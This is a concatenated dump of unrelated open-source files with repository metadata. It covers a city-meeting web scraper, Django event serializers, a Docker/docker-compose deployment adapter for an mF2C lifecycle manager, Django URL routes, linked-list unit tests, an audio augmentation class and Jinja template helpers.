self.assertEqual(v.ad, y.ad)
if __name__ == "__main__":
unittest.main()
| 24.032258 | 50 | 0.579866 |
ba6228799a4a396858109b5b37b5434b9afd3565 | 5,040 | py | Python | city_scrapers/spiders/det_downtown_development_authority.py | noahkconley/city-scrapers | 37420ce3a9295c2aac68c0fb4a957ad41394a801 | [
"MIT"
] | null | null | null | city_scrapers/spiders/det_downtown_development_authority.py | noahkconley/city-scrapers | 37420ce3a9295c2aac68c0fb4a957ad41394a801 | [
"MIT"
] | null | null | null | city_scrapers/spiders/det_downtown_development_authority.py | noahkconley/city-scrapers | 37420ce3a9295c2aac68c0fb4a957ad41394a801 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import re
from collections import defaultdict
from dateutil.parser import parse
from city_scrapers.spider import Spider
class DetDowntownDevelopmentAuthoritySpider(Spider):
name = 'det_downtown_development_authority'
agency_id = 'Downtown Development Authority'
timezone = 'America/Detroit'
allowed_domains = ['www.degc.org']
start_urls = ['http://www.degc.org/public-authorities/dda/']
def parse(self, response):
"""
`parse` should always `yield` a dict that follows the Event Schema
<https://city-bureau.github.io/city-scrapers/06_event_schema.html>.
Change the `_parse_id`, `_parse_name`, etc methods to fit your scraping
needs.
"""
yield from self._prev_meetings(response)
yield from self._next_meeting(response)
def _next_meeting(self, response):
next_meeting_xpath = '//text()[contains(., "The next Regular DDA Board meeting is")]'
next_meeting_text = ' '.join(response.xpath(next_meeting_xpath).extract())
data = self._set_meeting_defaults(response)
data['start'] = self._parse_start(next_meeting_text)
data['documents'] = self._parse_docs(response, data['start']['date'])
data['status'] = self._generate_status(data, text='')
data['id'] = self._generate_id(data)
yield data
def _prev_meetings(self, response):
prev_meetings_xpath = '//a[contains(., "Agendas and Minutes")]'
prev_meetings = response.xpath(prev_meetings_xpath)
for a in prev_meetings:
yield response.follow(a, callback=self._parse_prev_meetings)
@staticmethod
def _parse_start(date_time_text):
try:
dt = parse(date_time_text, fuzzy=True)
return {'date': dt.date(), 'time': dt.time(), 'note': ''}
except ValueError:
return {'date': None, 'time': None, 'note': ''}
def _parse_prev_meetings(self, response):
# there are only documents for prev meetings,
# so use these to create prev meetings
prev_meeting_docs = self._parse_prev_docs(response)
for meeting_date in prev_meeting_docs:
data = self._set_meeting_defaults(response)
data['start'] = {'date': meeting_date.date(), 'time': None, 'note': ''}
data['documents'] = prev_meeting_docs[meeting_date]
data['status'] = self._generate_status(data, text='')
data['id'] = self._generate_id(data)
yield data
def _parse_prev_docs(self, response):
docs = defaultdict(list)
links = response.css('li.linksGroup-item a')
for link in links:
link_text = link.xpath("span/text()").extract_first('')
is_date = self._parse_date(link_text)
if is_date:
dt = parse(is_date.group(1), fuzzy=True)
document = self._create_document(link)
docs[dt].append(document)
return docs
def _parse_docs(self, response, meeting_date):
docs = []
doc_links = response.xpath("//a[span/text()[contains(., 'Agenda')]]")
for link in doc_links:
# meeting details and docs are in separate places,
# so find the docs that match meeting_date
if self._matches_meeting_date(link, meeting_date):
document = self._create_document(link)
docs.append(document)
return docs
def _create_document(self, link):
link_text = link.xpath('span/text()').extract_first('')
date = self._parse_date(link_text).group(1)
desc = link_text.split(date)[-1]
url = link.xpath("@href").extract_first('')
if 'AGENDA' in desc.upper():
return {'url': url, 'note': 'agenda'}
if 'MINUTES' in desc.upper():
return {'url': url, 'note': 'minutes'}
return {'url': url, 'note': desc.lower().strip()}
def _matches_meeting_date(self, link, meeting_date):
link_text = link.xpath('span/text()').extract_first('')
if self._parse_date(link_text):
agenda_date = parse(link_text, fuzzy=True)
if agenda_date.date() == meeting_date:
return True
return False
@staticmethod
def _parse_date(text):
date_regex = re.compile(r'([A-z]+ [0-3]?[0-9], \d{4})')
return date_regex.search(text)
@staticmethod
def _set_meeting_defaults(response):
data = {
'_type': 'event',
'name': 'Board of Directors',
'event_description': '',
'classification': 'Board',
'end': {'date': None, 'time': None, 'note': ''},
'all_day': False,
'location': {
'neighborhood': '',
'name': 'DEGC, Guardian Building',
'address': '500 Griswold, Suite 2200, Detroit'
},
'documents': [],
'sources': [{'url': response.url, 'note': ''}]
}
return data
| 39.069767 | 93 | 0.59623 |
92b99b0da118b2dd8dccdef8a52408aebe6b49d4 | 2,272 | py | Python | apps/events/serializers.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 32 | 2017-02-22T13:38:38.000Z | 2022-03-31T23:29:54.000Z | apps/events/serializers.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 694 | 2017-02-15T23:09:52.000Z | 2022-03-31T23:16:07.000Z | apps/events/serializers.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 35 | 2017-09-02T21:13:09.000Z | 2022-02-21T11:30:30.000Z | import logging
from rest_framework import serializers
from apps.companyprofile.serializers import CompanySerializer
from apps.events.models import AttendanceEvent, CompanyEvent, Event, Extras, RuleBundle
from apps.gallery.serializers import ResponsiveImageSerializer
logger = logging.getLogger(__name__)
class ExtrasSerializer(serializers.ModelSerializer):
class Meta:
model = Extras
fields = ("id", "choice", "note")
class RuleBundleSerializer(serializers.ModelSerializer):
class Meta:
model = RuleBundle
fields = (
"description",
"field_of_study_rules",
"grade_rules",
"user_group_rules",
"rule_strings",
"id",
)
class AttendanceEventSerializer(serializers.ModelSerializer):
rule_bundles = RuleBundleSerializer(many=True)
extras = ExtrasSerializer(many=True)
class Meta:
model = AttendanceEvent
fields = (
"id",
"max_capacity",
"waitlist",
"guest_attendance",
"registration_start",
"registration_end",
"unattend_deadline",
"automatically_set_marks",
"rule_bundles",
"number_on_waitlist",
"number_of_seats_taken",
"extras",
)
class CompanyEventSerializer(serializers.ModelSerializer):
company = CompanySerializer()
class Meta:
model = CompanyEvent
fields = ("company", "event")
class EventSerializer(serializers.ModelSerializer):
absolute_url = serializers.CharField(source="get_absolute_url", read_only=True)
attendance_event = AttendanceEventSerializer()
company_event = CompanyEventSerializer(many=True)
image = ResponsiveImageSerializer()
class Meta:
model = Event
fields = (
"absolute_url",
"attendance_event",
"company_event",
"description",
"event_start",
"event_end",
"event_type",
"id",
"image",
"ingress",
"ingress_short",
"location",
"slug",
"title",
"organizer_name",
"organizer",
)
| 26.114943 | 87 | 0.596391 |
30f4d5f92e36aece82f45592ccbb67b07ee1dd1b | 16,368 | py | Python | lifecycle/modules/apps/docker/adapter.py | mF2C/LifecycleManagement | a9661c6dcaad94564c3e00d6059b9c0713b3f3c0 | [
"Apache-2.0"
] | null | null | null | lifecycle/modules/apps/docker/adapter.py | mF2C/LifecycleManagement | a9661c6dcaad94564c3e00d6059b9c0713b3f3c0 | [
"Apache-2.0"
] | 18 | 2017-10-25T08:17:24.000Z | 2019-12-10T08:43:45.000Z | lifecycle/modules/apps/docker/adapter.py | mF2C/LifecycleManagement | a9661c6dcaad94564c3e00d6059b9c0713b3f3c0 | [
"Apache-2.0"
] | null | null | null | """
Docker adapter
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 09 feb. 2018
@author: Roi Sucasas - ATOS
"""
from lifecycle.modules.apps.docker import client as docker_client
from lifecycle import common as common
from lifecycle.data import data_adapter as data_adapter
import uuid, os, time
import urllib.request as urequest
from lifecycle.data.common import db as db #import SERVICE_INSTANCES_LIST
from lifecycle.logs import LOG
import config
from lifecycle.common import OPERATION_START, OPERATION_STOP, OPERATION_TERMINATE, \
STATUS_ERROR, STATUS_WAITING, STATUS_STARTED, STATUS_STOPPED, STATUS_ERROR_STARTING, STATUS_ERROR_STOPPING, \
STATUS_TERMINATED, STATUS_UNKNOWN, SERVICE_DOCKER, SERVICE_DOCKER_COMPOSE, SERVICE_COMPSS
'''
Data managed by this component:
-----------------------------------------------------------------------------------------------
SERVICE INSTANCE:
{
...
"id": "",
"user_id": "testuser",
"service_id": "",
"agreement_id": "",
"status": "waiting",
"agents": [
{"agent": resource-link, "url": "192.168.1.31", "ports": [8081], "container_id": "10asd673f", "status": "waiting",
"num_cpus": 3, "allow": true, "master_compss": false},
{"agent": resource-link, "url": "192.168.1.34", "ports": [8081], "container_id": "99asd673f", "status": "waiting",
"num_cpus": 2, "allow": true, "master_compss": false}
]
}
Agent example: {"agent": resource-link, "url": "192.168.1.31", "ports": {8081}, "container_id": "10asd673f",
"status": "waiting", "num_cpus": 3, "allow": true, "master_compss": false}
'''
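# Illustrative helper (a sketch, not part of the original module): given a
# service instance shaped like the docstring example above, look up the agent
# entry for a given URL. Only the 'agents' and 'url' keys come from the
# docstring; everything else here is an assumption.
def _find_agent_by_url(service_instance, url):
    """Return the agent dict whose 'url' matches, or None if absent."""
    for agent in service_instance.get('agents', []):
        if agent.get('url') == url:
            return agent
    return None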
###############################################################################
# DEPLOYMENT:
# deploy_docker_image:
def __deploy_docker_image(service, agent):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_image] " + str(service) + ", " + str(agent))
try:
# service image / location. Examples: "yeasy/simple-web"
service_image = service['exec']
# service_name examples: "simple-web-test"
service_name = service['name'] + "-" + str(uuid.uuid4())
# command. Docker examples: "/bin/sh -c 'python index.py'"
service_command = ""
# port(s)
ports = agent['ports']
container1 = docker_client.create_docker_container(service_image, service_name, service_command, ports)
if container1 is not None:
db.SERVICE_INSTANCES_LIST.append({
"type": SERVICE_DOCKER,
"container_main": container1['Id'],
"container_2": "-"
})
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_image] container: " + str(container1))
# update agent properties
agent['container_id'] = container1['Id']
agent['agent_param'] = "-"
agent['status'] = STATUS_WAITING
return common.gen_response_ok('Deploy service in agent', 'agent', str(agent), 'service', str(service))
else:
LOG.error("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_image] Could not connect to DOCKER API")
agent['status'] = STATUS_ERROR
return common.gen_response(500, 'Error when connecting to DOCKER API', 'agent', str(agent), 'service', str(service))
except:
LOG.exception('[lifecycle.modules.apps.docker.adapter] [__deploy_docker_image] Exception')
return common.gen_response(500, 'Exception: __deploy_docker_image()', 'agent', str(agent), 'service', str(service))
# deploy_docker_compss:
def __deploy_docker_compss(service, service_instance, agent):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compss] " + str(service) + ", " + str(agent))
try:
# service image / location. Examples: "mf2c/compss-agent:latest", "mf2c/compss-mf2c:1.0"
service_image = service['exec']
# port(s); COMPSs exposes port 8080
ports = agent['ports']
# ip
ip = agent['url']
# ip_leader
        ip_leader = service_instance['device_ip'] # TODO create an 'exec_device_ip'
container1, agents_ports = docker_client.create_docker_compss_container(service_image, ip, ports, ip_leader)
if container1 is not None:
db.SERVICE_INSTANCES_LIST.append({
"type": SERVICE_COMPSS,
"container_main": container1['Id'],
"container_2": "-"
})
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compss] container: " + str(container1))
# update agent properties
agent['container_id'] = container1['Id']
agent['agent_param'] = "-"
agent['ports'] = agents_ports
agent['status'] = STATUS_WAITING
return common.gen_response_ok('Deploy service in agent', 'agent', str(agent), 'service', str(service))
else:
LOG.error("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compss] Could not connect to DOCKER API")
agent['status'] = STATUS_ERROR
return common.gen_response(500, 'Error when connecting to DOCKER API', 'agent', str(agent), 'service', str(service))
except:
LOG.exception('[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compss] Exception')
return common.gen_response(500, 'Exception: __deploy_docker_compss()', 'agent', str(agent), 'service', str(service))
# deploy_docker_compose:
# Command: sudo docker run -v /var/run/docker.sock:/var/run/docker.sock
# -v /home/atos/mF2C/compose_examples:/home/atos/mF2C/compose_examples
# -w="/home/atos/mF2C/compose_examples" docker/compose:1.21.0 up
def __deploy_docker_compose(service, agent):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] " + str(service) + ", " + str(agent))
try:
# 1. Download docker-compose.yml file
location = service['exec']
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Getting docker-compose.yml from " + location + " ...")
# remove previous files
try:
os.remove(config.dic['WORKING_DIR_VOLUME'] + "/docker-compose.yml")
except:
LOG.warning("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Error when removing file: " + config.dic['WORKING_DIR_VOLUME'] + "/docker-compose.yml")
# download docker-compose.yml
try:
res, _ = urequest.urlretrieve(location, config.dic['WORKING_DIR_VOLUME'] + "/docker-compose.yml")
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] > download result: " + str(res))
except:
LOG.exception("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Error when downloading file to: " + config.dic['WORKING_DIR_VOLUME'] + "/docker-compose.yml")
return common.gen_response(500, "Exception: deploy_docker_compose(): Error when downloading file to WORKING_DIR_VOLUME",
"agent", str(agent),
"WORKING_DIR_VOLUME", config.dic['WORKING_DIR_VOLUME'])
# 2. Deploy container
service_name = service['name'] + "-" + str(uuid.uuid4()) # service_name
service_command = "up" # command
# container 1 => command 'up'
container1 = docker_client.create_docker_compose_container(service_name, service_command)
if container1 is not None:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] container1: " + str(container1))
# container 2 => command 'down'
container2 = docker_client.create_docker_compose_container(service_name + "-" + str(uuid.uuid4()), "down")
if container2 is not None:
db.SERVICE_INSTANCES_LIST.append({
"type": SERVICE_DOCKER_COMPOSE,
"container_main": container1['Id'],
"container_2": container2['Id']
})
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] container2: " + str(container2))
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] container '1' & '2' created")
agent['agent_param'] = container2['Id']
else:
db.SERVICE_INSTANCES_LIST.append({
"type": SERVICE_DOCKER_COMPOSE,
"container_main": container1['Id'],
"container_2": 'error'
})
LOG.error("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] container '2' not created")
agent['agent_param'] = "-"
# update agent properties
agent['container_id'] = container1['Id']
agent['status'] = STATUS_WAITING
return common.gen_response_ok('Deploy service in agent', 'agent', str(agent), 'service', str(service))
else:
LOG.error("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Could not connect to DOCKER API")
agent['status'] = STATUS_ERROR
return common.gen_response(500, 'Error when connecting to DOCKER API', 'agent', str(agent), 'service',
str(service))
except:
LOG.exception('[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Exception')
return common.gen_response(500, 'Exception: __deploy_docker_compose()', 'agent', str(agent), 'service', str(service))
# deploy_service_agent: Deploy service in an agent
# IN: service, agent
# OUT: status value
def deploy_service_agent(service, service_instance, agent):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [deploy_service_agent] " + str(service) + ", " + str(agent))
try:
# docker-compose
if service['exec_type'] == SERVICE_DOCKER_COMPOSE:
return __deploy_docker_compose(service, agent)
# docker
elif service['exec_type'] == SERVICE_DOCKER:
return __deploy_docker_image(service, agent)
# compss (docker)
elif service['exec_type'] == SERVICE_COMPSS:
return __deploy_docker_compss(service, service_instance, agent)
# not defined
else:
LOG.warning("[lifecycle.modules.apps.docker.adapter] [deploy_service_agent] [" + service['exec_type'] + "] not defined")
return common.gen_response(500, 'Exception: type not defined: deploy_service_agent()', 'agent', str(agent),
'service', str(service))
except:
LOG.exception('[lifecycle.modules.apps.docker.adapter] [deploy_service_agent] Exception')
return common.gen_response(500, 'Exception: deploy_service_agent()', 'agent', str(agent), 'service', str(service))
###############################################################################
# OPERATIONS:
# operation_service_agent: service operation (start, stop...)
def __operation_service_agent(agent, operation):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] [" + operation + "]: " + str(agent))
try:
# connect to docker api / check existing connection
if docker_client.get_client_agent_docker() is not None:
if operation == OPERATION_START:
if docker_client.start_container(agent['container_id']):
agent['status'] = STATUS_STARTED
else:
agent['status'] = STATUS_ERROR_STARTING
if config.dic['NETWORK_COMPSs'] != "not-defined":
docker_client.add_container_to_network(agent['container_id'])
elif operation == OPERATION_STOP:
l_elem = data_adapter.db_get_elem_from_list(agent['container_id'])
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] docker-compose? [l_elem=" + str(l_elem) + "]")
# docker-compose
if l_elem is not None and l_elem['type'] == SERVICE_DOCKER_COMPOSE:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] 'Docker-compose down' container [" + l_elem['container_2'] + "] launched ...")
docker_client.start_container(l_elem['container_2'])
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Executing 'docker-compose down' ...")
for i in range(6):
time.sleep(20)
res = docker_client.inspect_container(l_elem['container_2'])
if res is not None and res['State']['Status'] is not None and res['State']['Status'] == 'exited':
break
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Waiting for 'docker-compose down' execution (20s) ...")
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Stopping 'Docker-compose up' container [" + agent['container_id'] + "] ...")
docker_client.stop_container(agent['container_id'])
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Stopping 'Docker-compose down' container [" + l_elem['container_2'] + "] ...")
docker_client.stop_container(l_elem['container_2'])
agent['status'] = STATUS_STOPPED
# 'normal' container
else:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Stop container: " + agent['container_id'])
if docker_client.stop_container(agent['container_id']):
agent['status'] = STATUS_STOPPED
else:
agent['status'] = STATUS_ERROR_STOPPING
elif operation == OPERATION_TERMINATE:
l_elem = data_adapter.db_get_elem_from_list(agent['container_id'])
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] docker-compose? [l_elem=" + str(l_elem) + "]")
# docker-compose
if l_elem is not None and l_elem['type'] == SERVICE_DOCKER_COMPOSE:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Remove container 1 [" + agent['container_id'] + "] ...")
docker_client.remove_container(agent)
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Remove container 2 [" + l_elem['container_2'] + "] ...")
docker_client.remove_container_by_id(l_elem['container_2'])
# 'normal' container
else:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Remove container: " + agent['container_id'])
docker_client.remove_container(agent)
agent['status'] = STATUS_TERMINATED
# if error when connecting to agent...
else:
LOG.error("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Could not connect to DOCKER API")
agent['status'] = STATUS_UNKNOWN
# return status
return agent['status']
except:
agent['status'] = STATUS_ERROR
LOG.exception('[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Exception')
return STATUS_ERROR
# start_service_agent: Start service in agent
def start_service_agent(agent):
return __operation_service_agent(agent, OPERATION_START)
# stop_service_agent: Stop service / stop container
def stop_service_agent(agent):
return __operation_service_agent(agent, OPERATION_STOP)
# terminate_service_agent: Stop service / stop container
def terminate_service_agent(agent):
return __operation_service_agent(agent, OPERATION_TERMINATE)
| 53.142857 | 186 | 0.624695 |
f0522181ec65049030b67bc6b8b967f64dbbcf82 | 6,540 | py | Python | site/public/courses/CS-1.2/Code/linkedlist_test.py | KitsuneNoctus/makeschool | 5eec1a18146abf70bb78b4ee3d301f6a43c9ede4 | [
"MIT"
] | 1 | 2021-08-24T20:22:19.000Z | 2021-08-24T20:22:19.000Z | site/public/courses/CS-1.2/Code/linkedlist_test.py | KitsuneNoctus/makeschool | 5eec1a18146abf70bb78b4ee3d301f6a43c9ede4 | [
"MIT"
] | null | null | null | site/public/courses/CS-1.2/Code/linkedlist_test.py | KitsuneNoctus/makeschool | 5eec1a18146abf70bb78b4ee3d301f6a43c9ede4 | [
"MIT"
] | null | null | null | #!python
from linkedlist import LinkedList, Node
import unittest
class NodeTest(unittest.TestCase):
def test_init(self):
data = 'ABC'
node = Node(data)
# Initializer should add instance properties
assert node.data is data
assert node.next is None
def test_linking_nodes(self):
node1 = Node('A')
node2 = Node('B')
node3 = Node('C')
# Link nodes together
node1.next = node2
node2.next = node3
# Node links should be transitive
assert node1.next is node2 # One link
assert node1.next.next is node3 # Two links
class LinkedListTest(unittest.TestCase):
def test_init(self):
ll = LinkedList()
# Initializer should add instance properties
assert ll.head is None # First node
assert ll.tail is None # Last node
def test_init_with_list(self):
ll = LinkedList(['A', 'B', 'C'])
# Initializer should append items in order
assert ll.head.data == 'A' # First item
assert ll.tail.data == 'C' # Last item
def test_items_after_append(self):
ll = LinkedList()
assert ll.items() == []
# Append should add new item to tail of list
ll.append('A')
assert ll.items() == ['A']
ll.append('B')
assert ll.items() == ['A', 'B']
ll.append('C')
assert ll.items() == ['A', 'B', 'C']
def test_items_after_prepend(self):
ll = LinkedList()
assert ll.items() == []
# Prepend should add new item to head of list
ll.prepend('C')
assert ll.items() == ['C']
ll.prepend('B')
assert ll.items() == ['B', 'C']
ll.prepend('A')
assert ll.items() == ['A', 'B', 'C']
def test_length_after_append(self):
ll = LinkedList()
assert ll.length() == 0
# Append should increase length
ll.append('A')
assert ll.length() == 1
ll.append('B')
assert ll.length() == 2
ll.append('C')
assert ll.length() == 3
def test_length_after_prepend(self):
ll = LinkedList()
assert ll.length() == 0
# Prepend should increase length
ll.prepend('C')
assert ll.length() == 1
ll.prepend('B')
assert ll.length() == 2
ll.prepend('A')
assert ll.length() == 3
def test_length_after_append_and_prepend(self):
ll = LinkedList()
assert ll.length() == 0
# Append and prepend should increase length
ll.append('C')
assert ll.length() == 1
ll.prepend('B')
assert ll.length() == 2
ll.append('D')
assert ll.length() == 3
ll.prepend('A')
assert ll.length() == 4
def test_length_after_delete(self):
ll = LinkedList(['A', 'B', 'C', 'D', 'E'])
assert ll.length() == 5
# Delete should decrease length
ll.delete('A')
assert ll.length() == 4
ll.delete('E')
assert ll.length() == 3
ll.delete('C')
assert ll.length() == 2
ll.delete('D')
assert ll.length() == 1
ll.delete('B')
assert ll.length() == 0
def test_append(self):
ll = LinkedList()
# Append should always update tail node
ll.append('A')
assert ll.head.data == 'A' # New head
assert ll.tail.data == 'A' # New tail
ll.append('B')
assert ll.head.data == 'A' # Unchanged
assert ll.tail.data == 'B' # New tail
ll.append('C')
assert ll.head.data == 'A' # Unchanged
assert ll.tail.data == 'C' # New tail
def test_prepend(self):
ll = LinkedList()
# Prepend should always update head node
ll.prepend('C')
assert ll.head.data == 'C' # New head
assert ll.tail.data == 'C' # New head
ll.prepend('B')
assert ll.head.data == 'B' # New head
assert ll.tail.data == 'C' # Unchanged
ll.prepend('A')
assert ll.head.data == 'A' # New head
assert ll.tail.data == 'C' # Unchanged
def test_find(self):
ll = LinkedList(['A', 'B', 'C'])
assert ll.find('B') == True
assert ll.find('A') == True # Match less than
assert ll.find('C') == True # Match greater than
assert ll.find('X') == False # No matching item
def test_delete_with_3_items(self):
ll = LinkedList(['A', 'B', 'C'])
assert ll.head.data == 'A' # First item
assert ll.tail.data == 'C' # Last item
ll.delete('A')
assert ll.head.data == 'B' # New head
assert ll.tail.data == 'C' # Unchanged
ll.delete('C')
assert ll.head.data == 'B' # Unchanged
assert ll.tail.data == 'B' # New tail
ll.delete('B')
assert ll.head is None # No head
assert ll.tail is None # No tail
# Delete should raise error if item was already deleted
with self.assertRaises(ValueError):
ll.delete('A') # Item no longer in list
with self.assertRaises(ValueError):
ll.delete('B') # Item no longer in list
with self.assertRaises(ValueError):
ll.delete('C') # Item no longer in list
def test_delete_with_5_items(self):
ll = LinkedList(['A', 'B', 'C', 'D', 'E'])
assert ll.head.data == 'A' # First item
assert ll.tail.data == 'E' # Last item
ll.delete('A')
assert ll.head.data == 'B' # New head
assert ll.tail.data == 'E' # Unchanged
ll.delete('E')
assert ll.head.data == 'B' # Unchanged
assert ll.tail.data == 'D' # New tail
ll.delete('C')
assert ll.head.data == 'B' # Unchanged
assert ll.tail.data == 'D' # Unchanged
ll.delete('D')
assert ll.head.data == 'B' # Unchanged
assert ll.tail.data == 'B' # New tail
ll.delete('B')
assert ll.head is None # No head
assert ll.tail is None # No tail
def test_delete_with_item_not_in_list(self):
ll = LinkedList(['A', 'B', 'C'])
# Delete should raise error if item not found
with self.assertRaises(ValueError):
ll.delete('X') # Item not found in list
if __name__ == '__main__':
unittest.main()
| 33.19797 | 64 | 0.520795 |
fd5766b715d21464a9c232d0890cfbcafae56eda | 824 | py | Python | appgen/urls.py | Ecotrust/madrona-app-generator | 078d124a8aacadf8a151da7a5434f68868564431 | [
"BSD-3-Clause"
] | null | null | null | appgen/urls.py | Ecotrust/madrona-app-generator | 078d124a8aacadf8a151da7a5434f68868564431 | [
"BSD-3-Clause"
] | null | null | null | appgen/urls.py | Ecotrust/madrona-app-generator | 078d124a8aacadf8a151da7a5434f68868564431 | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import patterns, include, url
from django.http import HttpResponseRedirect
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Always go to the appconfig changelist
url(r'^activate/(?P<pk>\d+)/$', 'appgen.views.activate', name='activate'),
url(r'^initialize/(?P<pk>\d+)/$', 'appgen.views.initialize', name='initialize'),
url(r'^delete/(?P<pk>\d+)/$', 'appgen.views.delete', name='delete'),
url(r'^initial_docs/$', 'appgen.views.initial_docs', name='initial_docs'),
(r'^$', lambda x: HttpResponseRedirect('/admin/appgen/appconfig/')),
(r'^admin/$', lambda x: HttpResponseRedirect('/admin/appgen/appconfig/')),
(r'^admin/appgen/$', lambda x: HttpResponseRedirect('/admin/appgen/appconfig/')),
(r'^admin/', include(admin.site.urls)),
)
| 45.777778 | 85 | 0.679612 |
73f73dbcc5ff7c6f66531f5654ef65ef540794ef | 446 | py | Python | hw_asr/augmentations/sequential.py | alexdrydew/asr_project_template | f65a4662bb2e75aff5ca62361109192e3c324324 | [
"MIT"
] | 1 | 2021-10-06T13:08:29.000Z | 2021-10-06T13:08:29.000Z | hw_asr/augmentations/sequential.py | alexdrydew/asr_project_template | f65a4662bb2e75aff5ca62361109192e3c324324 | [
"MIT"
] | 1 | 2021-10-10T21:38:51.000Z | 2021-10-11T21:36:48.000Z | hw_asr/augmentations/sequential.py | alexdrydew/asr_project_template | f65a4662bb2e75aff5ca62361109192e3c324324 | [
"MIT"
] | 11 | 2021-10-05T14:02:26.000Z | 2021-11-25T22:02:56.000Z | from typing import List, Callable
from torch import Tensor
from hw_asr.augmentations.base import AugmentationBase
class SequentialAugmentation(AugmentationBase):
def __init__(self, augmentation_list: List[Callable]):
self.augmentation_list = augmentation_list
def __call__(self, data: Tensor) -> Tensor:
x = data
for augmentation in self.augmentation_list:
            x = augmentation(x)  # chain: feed each augmentation the previous output
return x
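# Illustrative usage (a comment-only sketch; the lambdas stand in for real
# augmentations and 'torch' is assumed to be importable):
#   pipeline = SequentialAugmentation([lambda t: t * 2, lambda t: t + 1])
#   pipeline(torch.zeros(3))  # -> tensor([1., 1., 1.]), i.e. (0 * 2) + 1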
| 26.235294 | 58 | 0.719731 |
3b12dad00c29569e7f8d4247a792801f36665412 | 1,160 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/jinja/get.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | null | null | null | pkgs/sdk-pkg/src/genie/libs/sdk/apis/jinja/get.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 1 | 2020-08-01T00:59:29.000Z | 2020-08-01T00:59:32.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/jinja/get.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | null | null | null | # Python
import jinja2
from jinja2.exceptions import TemplateNotFound
def get_jinja_template(templates_dir, template_name):
""" Gets the jinja template specified
Args:
templates_dir ('str'): Templates directory
template_name ('str'): Template name
Returns:
('obj') jinja template
None
Raises:
None
"""
env = jinja2.Environment(
loader=jinja2.FileSystemLoader(searchpath=templates_dir),
undefined=jinja2.StrictUndefined
)
try:
template = env.get_template(template_name)
except TemplateNotFound:
return
return template
def load_jinja_template(path, file, **kwargs):
"""Use Jinja templates to build the device configuration
Args:
path (`str`): Path to file directory
file (`str`): File name
kwargs (`dict`): Key value pairs
Returns:
out (`str`): Rendered template
"""
env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath=path))
template = env.get_template(file)
out = template.render(**kwargs)
return out
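# Illustrative usage (a comment-only sketch; the directory and template names
# are made up):
#   template = get_jinja_template('./templates', 'iface.j2')
#   out = load_jinja_template('./templates', 'iface.j2', interface='Ethernet1/1')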
| 23.673469 | 77 | 0.621552 |
2f1277ad84cca73955b6bbefe4489f4fabb4fc70 | 17,883 | py | Python | tests/shell/test_shell_commandline.py | henryr/minimised-impala | 264d20a4f02ece6ee94e96bc49db2825b0bb1548 | [
"Apache-2.0"
] | null | null | null | tests/shell/test_shell_commandline.py | henryr/minimised-impala | 264d20a4f02ece6ee94e96bc49db2825b0bb1548 | [
"Apache-2.0"
] | null | null | null | tests/shell/test_shell_commandline.py | henryr/minimised-impala | 264d20a4f02ece6ee94e96bc49db2825b0bb1548 | [
"Apache-2.0"
] | null | null | null | # encoding=utf-8
# Copyright 2012 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
